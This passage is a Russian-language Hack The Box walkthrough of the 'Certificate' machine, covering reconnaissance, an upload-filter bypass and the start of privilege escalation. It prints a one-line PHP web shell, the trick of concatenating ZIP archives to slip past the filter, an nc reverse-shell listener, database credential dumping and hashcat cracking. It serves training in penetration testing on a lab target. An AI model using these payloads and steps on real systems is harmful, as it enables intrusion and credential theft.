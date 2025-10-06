Се­год­ня я покажу, как исполь­зовать при­виле­гию SeManageVolume для получе­ния «золото­го сер­тифика­та» и зах­вата домена на Windows. Перед этим нас ждет череда дру­гих уяз­вимос­тей: мы заг­рузим скле­енные ZIP-архи­вы на сайт, что­бы обой­ти филь­тр, получим шелл, вытащим учет­ки из базы дан­ных, про­ана­лизи­руем тра­фик для ата­ки на Kerberos и при­меним тех­нику ESC3 AD CS.

На­ша конеч­ная цель — получе­ние прав супер­поль­зовате­ля на машине Certificate с учеб­ной пло­щад­ки Hack The Box. Уро­вень задания — слож­ный.

warning Под­клю­чать­ся к машинам с HTB рекомен­дует­ся с при­мене­нием средств ано­ними­зации и вир­туали­зации. Не делай это­го с компь­юте­ров, где есть важ­ные для тебя дан­ные, так как ты ока­жешь­ся в общей сети с дру­гими учас­тни­ками.

Разведка

Сканирование портов

До­бав­ляем IP-адрес машины в / etc/ hosts :

10. 10. 11. 71 certificate. htb

И запус­каем ска­ниро­вание пор­тов.

Справка: сканирование портов Ска­ниро­вание пор­тов — стан­дар­тный пер­вый шаг при любой ата­ке. Он поз­воля­ет ата­кующе­му узнать, какие служ­бы на хос­те при­нима­ют соеди­нение. На осно­ве этой информа­ции выбира­ется сле­дующий шаг к получе­нию точ­ки вхо­да. На­ибо­лее извес­тный инс­тру­мент для ска­ниро­вания — это Nmap. Улуч­шить резуль­таты его работы ты можешь при помощи сле­дующе­го скрип­та: #!/ bin/ bash ports = $( nmap -p- --min-rate = 500 $1 | grep ^[ 0- 9] | cut -d '/ ' -f 1 | tr ' ' ', ' | sed s/, $/ / ) nmap -p $ports -A $1 Он дей­ству­ет в два эта­па. На пер­вом про­изво­дит­ся обыч­ное быс­трое ска­ниро­вание, на вто­ром — более тща­тель­ное ска­ниро­вание, с исполь­зовани­ем име­ющих­ся скрип­тов (опция -A ).

Ска­нер нашел 13 откры­тых пор­тов:

80 (HTTP) — веб‑сер­вер Apache 2.4.58;

88 — Kerberos;

135 — Microsoft RPC;

139 — NetBIOS, NetLogon;

389 — LDAP;

445 — SMB;

464 — служ­ба сме­ны пароля Kerberos;

593 (HTTP-RPC-EPMAP) — исполь­зует­ся в служ­бах DCOM и MS Exchange;

636 — LDAP с шиф­ровани­ем SSL или TLS;

3268 (LDAP) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру;

3269 (LDAPS) — для дос­тупа к Global Catalog от кли­ента к кон­трол­леру через защищен­ное соеди­нение;

5985 — WinRM;

9389 — веб‑служ­бы AD DS.

До­бав­ляем имя кон­трол­лера домена в файл / etc/ hosts .

10. 10. 11. 71 certificate. htb dc01. certificate. htb

На хос­те работа­ет веб‑сер­вер, поэто­му сра­зу прос­мотрим сайт.

Точка входа

На сай­те мож­но зарегис­три­ровать­ся, обя­затель­но сде­лаем это, что­бы иметь мак­симум воз­можнос­тей.

На сай­те ничего инте­рес­ного най­ти не уда­лось, поэто­му прис­тупим к ска­ниро­ванию катало­гов при помощи feroxbuster.

Справка: сканирование веба c feroxbuster Од­но из пер­вых дей­ствий при тес­тирова­нии безопас­ности веб‑при­ложе­ния — это ска­ниро­вание методом перебо­ра катало­гов, что­бы най­ти скры­тую информа­цию и недос­тупные обыч­ным посети­телям фун­кции. Для это­го мож­но исполь­зовать прог­раммы вро­де dirsearch, DIRB или ffuf. Я пред­почитаю feroxbuster. При запус­ке ука­зыва­ем сле­дующие парамет­ры: -u — URL;

— URL; -d — глу­бина ска­ниро­вания;

— глу­бина ска­ниро­вания; -t — количес­тво потоков;

— количес­тво потоков; -w — сло­варь (я исполь­зую сло­вари из набора SecLists).

За­даем все парамет­ры и запус­каем ска­нер:

feroxbuster -u http:/ / certificate. htb/ -d 1 -t 128 -w php_ files_ common. txt

На­ходим инте­рес­ные стра­ницы вро­де db. php , которая говорит об исполь­зовании базы дан­ных, а так­же upload. php — для заг­рузки фай­лов. Но сама стра­ница тре­бует допол­нитель­ные парамет­ры.

Ос­матри­ваем­ся на сай­те и находим стра­ницу с кур­сами. При перехо­де к опре­делен­ному кур­су появ­ляет­ся стра­ница с фор­мой заг­рузки фай­ла.

Точка опоры

Файл при­нима­ет офис­ные докумен­ты и ZIP-архи­вы. При попыт­ке заг­рузить на сер­вер веб‑шелл в архи­ве получа­ем ошиб­ку с помет­кой о вре­донос­ном кон­тенте.

Од­нако мож­но вос­поль­зовать­ся тех­никой объ­еди­нения архи­вов, при которой два архи­ва будут записа­ны под­ряд в одном фай­ле. Про­верять­ся будет пер­вый архив, а фай­лы получим из вто­рого.

# < ?=`$_GET[ 0] `?> echo -n qweqwe > file. pdf zip file. zip file. pdf zip shell. zip shell. php cat file. zip shell. zip > all. zip

При прос­мотре в адресной стро­ке видим путь к фай­лу.

Те­перь вмес­то file. pdf ука­зыва­ем свой реверс‑шелл shell. php и коман­ду whoami .

За­пус­каем лис­тенер:

rlwrap nc -nlvp 4321

И выпол­няем реверс‑шелл, что­бы получить удоб­ную коман­дную обо­лоч­ку. Получа­ем сес­сию от име­ни учет­ной записи xamppuser .

Продвижение

Пользователь Sara.B

Веб‑при­ложе­ние исполь­зует базу дан­ных, и в фай­ле db. php лежат учет­ные дан­ные от нее — без проб­лем получа­ем их.

В XAMPP вхо­дят ути­литы для работы с базами дан­ных MySQL, можем ими вос­поль­зовать­ся.

Пер­вым делом получим спи­сок баз дан­ных.

mysql. exe -u certificate_webapp_user -p "cert!f!c@teDBPWD" -e "show databases; "

Пер­спек­тивнее все­го выг­лядит certificate_webapp_db . Зап­рашива­ем спи­сок таб­лиц этой базы дан­ных.

mysql. exe -u certificate_ webapp_ user -p "cert!f!c@teDBPWD" -e "use certificate_webapp_db; show tables; "

В таб­лице users , ско­рее все­го, лежат учет­ные дан­ные поль­зовате­лей. Пос­мотрим поб­лиже.

mysql. exe -u certificate_ webapp_ user -p "cert!f!c@teDBPWD" -e "use certificate_webapp_db; select * from users; "

Сох­раним хеши поль­зовате­лей, у которых поч­та на домене certificate. htb , и проб­рутим с помощью hashcat.

hashcat -m 3200 hashes. txt rockyou. txt

У нас один пароль, поэто­му получим спи­сок поль­зовате­лей домена и сох­раним в файл.